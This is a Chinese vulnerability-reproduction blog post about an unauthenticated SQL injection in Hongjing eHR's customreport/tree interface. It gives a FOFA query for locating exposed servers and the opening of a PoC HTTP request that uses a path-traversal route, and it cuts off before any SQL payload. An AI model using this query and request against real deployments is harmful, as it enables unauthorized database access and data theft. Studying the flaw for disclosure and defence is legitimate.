宏景eHR customreport/tree SQL注入漏洞复现

  • 开发
  • 11

0x01 产品简介

宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。

0x02 漏洞概述

宏景eHR customreport/tree 接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。

0x03 复现环境

FOFA:app="HJSOFT-HCM"

0x04 漏洞复现

PoC

POST /templates/attestation/../../servlet/sys/option/customreport/tree HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36AppleWebKit/537.36 (KHTML, like Gecko)
阅读全部

相关推荐

  9. 漏洞】NotificationX SQL注入漏洞(CVE-2024-1698)

    2024-04-13 02:32:01       22 阅读

  10. 漏洞】SpringBlade dict-biz SQL注入漏洞

    2024-04-13 02:32:01       13 阅读

最近更新

  4. TCP协议是安全的吗?

    2024-04-13 02:32:01       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-04-13 02:32:01       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-04-13 02:32:01       18 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-04-13 02:32:01       20 阅读

热门阅读

  4. ccf201712-2游戏

    2024-04-13 02:32:01       13 阅读

  6. 替换服务器的SSL证书有什么影响?

    2024-04-13 02:32:01       13 阅读

  9. 数据库迁移平台构思001

    2024-04-13 02:32:01       12 阅读

  10. 自回归模型

    2024-04-13 02:32:01       14 阅读

  13. jQuery笔记 01

    2024-04-13 02:32:01       10 阅读

  18. 循环控制语句的实际应用(3)

    2024-04-13 02:32:01       12 阅读

  21. 每日一题 第九十期 洛谷 [蓝桥杯 2020 省 AB1] 网络分析

    2024-04-13 02:32:01       16 阅读

  24. MR混合现实情景实训教学系统在汽车维修中的应用

    2024-04-13 02:32:01       14 阅读

  29. Python:生成器

    2024-04-13 02:32:01       14 阅读